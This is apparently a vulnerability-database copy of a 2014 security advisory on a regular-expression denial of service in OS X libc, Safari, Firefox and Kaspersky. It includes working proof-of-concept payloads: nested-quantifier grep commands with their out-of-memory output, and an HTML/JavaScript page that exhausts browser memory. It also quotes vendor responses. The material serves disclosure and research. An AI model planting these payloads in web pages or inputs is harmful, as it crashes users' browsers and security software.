Lucene search
K

OS X / Safari / Firefox REGEX Denial Of Service

🗓️ 14 Mar 2014 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 62 Views

MacOSX Safari Firefox regexp denial of service issue CVE-2011-333

Related
Code
ReporterTitlePublishedViews
Family
0day.today
GNU libc/regcomp(3) Multiple Vulnerabilities
8 Jan 201100:00
zdt
0day.today
FreeBSD 9.1 ftpd Remote Denial of Service
5 Feb 201300:00
zdt
Circl
CVE-2010-4052
7 Dec 201000:00
circl
Circl
CVE-2011-3336
4 Nov 201100:00
circl
CVE
CVE-2010-4051
13 Jan 201118:35
cve
CVE
CVE-2010-4052
13 Jan 201118:35
cve
CVE
CVE-2011-3336
12 Feb 202019:32
cve
Cvelist
CVE-2010-4051
13 Jan 201118:35
cvelist
Cvelist
CVE-2010-4052
13 Jan 201118:35
cvelist
Cvelist
CVE-2011-3336
12 Feb 202019:32
cvelist
Rows per page
`MacOSX Safari Firefox Kaspersky RegExp Remote/Local Denial of Service  
http://cxsecurity.com/  
  
  
---- 0. Where is the problem? ----  
Some time ago I have reported vulnerabilities in regcomp() in BSD  
implementation (CVE-2011-3336) and GNU libc implementation (CVE-2010-4051  
CVE-2010-4052).  
Now is the time for MacOSX and other software and It seems that the problem  
is still in their implementations.  
  
  
--- MacOSX 10.9.2 libc PoC ---  
0:kozak6 cx$ ls |grep -E  
'((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'  
grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760)  
failed (error code=3)  
*** error: can't allocate region  
*** set a breakpoint in malloc_error_break to debug  
grep: out of memory  
--- MacOSX 10.9.2 libc PoC ---  
  
  
Recursion in Apple regcomp/libc() can lead to consumption, exhaustion, etc.  
(CWE-399)  
The same problem occurs in javascript regexp implementation on Safari and  
Firefox.  
In Kaspersky 14.0.0.4651(e) CPU Exhaustion has been observed.  
  
  
Verified;  
- Safari 7.0.2 (9537.74.9)  
MacOSX 10.9.2 Memory exhaustion (unpatched CVE-2011-3336)  
Phone 4S, iOS 7.0.6 Crash  
  
- Firefox 27.0.1  
Windows: Crash  
http://cert.cx/regexp-smaczki/regcomp2.png  
http://cert.cx/regexp-smaczki/visual4.png  
http://cert.cx/regexp-smaczki/visual3.png  
  
MacOSX: Memory exhaustion  
  
- Kaspersky 14.0.0.4651(e)  
CPU Exhaustion and can't restart kaspersky again  
http://cert.cx/regexp-smaczki/kaspersky.jpg  
  
  
We don't know full list of affected vendors. Anyway javascript PoC  
avaliable here  
  
http://cert.cx/regexp-smaczki/regex.html  
  
--- JavaScript PoC ---  
<HTML>  
<HEAD>  
<TITLE>Firefox 27.0.1 and Safari 7.0.2 (9537.74.9)</TITLE>  
</HEAD>  
<BODY BGCOLOR="#FFFFFF">  
<SCRIPT type="text/javascript">  
var patt1=new  
RegExp("((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))");  
document.write(patt1.exec("peace"));  
</SCRIPT>  
</BODY>  
</HTML>  
--- JavaScript PoC ---  
  
  
On Safari and Firefox under MacOSX this script will consume excessive  
memory. Windows version has allocated 3,8GB and crash  
  
  
----------------------------  
int readChecked(unsigned negativePositionOffest)  
{  
if (pos < negativePositionOffest)  
CRASH();  
unsigned p = pos - negativePositionOffest;  
ASSERT(p < length);  
return input[p];  
}  
----------------------------  
  
  
Firefox don't support 64 bits version for windows and only 4gb can be  
allocated to cause CRASH().  
  
The most interesting is CPU Exhaustion observed in avp.exe process. Many  
requests to website where RegEx()/javascript code is located cause  
exhaustion of one cpu core. Closing and restarting Kaspersky is impossible.  
  
The situation with regexp security is not declared. Many vendors think that  
regcomp() should be secure by default but are also others opinions  
  
https://bugzilla.redhat.com/show_bug.cgi?id=645859  
---  
Red Hat does not consider crash of client application, using regcomp()  
or regexec() routines on untrusted input without preliminary checking  
the input for the sanity, to be a security issue (the described deficiency  
implies and is a known limitation of the glibc regular expression engine  
implementation). The expressions can be modified to avoid quantification  
nesting, or program modified to limit size of input passed to regular  
expression engine. We do not currently plan to fix these flaws. If more  
information becomes available at a future date, we may revisit these issues.  
---  
  
and try compare with ZABIX statement  
  
https://support.zabbix.com/browse/ZBX-4625  
  
---  
It shouldn't be fixed in Zabbix. That's something to be addressed by glibc  
maintainers.  
---  
  
In January 2014 Juniper has officially patched CVE-2010-4051 and  
CVE-2010-4052 in own products.  
  
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10612.  
  
MacOSX libc in 10.9.2 is still vulnerable for CVE-2011-3336.  
  
0:log cx$ ls |grep -E '(.?)((((.*){1,100}){1,100}){1,100}){1,100}'  
  
It shows how many varieties of regular expression we have and how hard it  
is to keep a single standard.  
  
  
--- 1. Credit ---  
Maksymilian Arciemowicz  
http://cxsecurity.com/  
  
  
--- 2. References ---  
http://cxsecurity.com/issue/WLB-2011010121  
http://cxsecurity.com/issue/WLB-2011110082  
http://cxsecurity.com/cveshow/CVE-2010-4051  
http://cxsecurity.com/cveshow/CVE-2010-4052  
http://www.kb.cert.org/vuls/id/912279  
http://cxsecurity.com/cveshow/CVE-2011-3336  
http://cxsecurity.com/  
http://cert.cx/regexp-smaczki/regcomp2.png  
http://cert.cx/regexp-smaczki/visual4.png  
http://cert.cx/regexp-smaczki/visual3.png  
http://cert.cx/regexp-smaczki/kaspersky.jpg  
https://bugzilla.redhat.com/show_bug.cgi?id=645859  
https://support.zabbix.com/browse/ZBX-4625  
http://cert.cx/regexp-smaczki/regex.html  
https://devilteam.pl/kaspkersky.html  
https://devilteam.pl/  
  
  
Best regards,  
CXSEC TEAM  
http://cxsec.org/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Mar 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.24637
62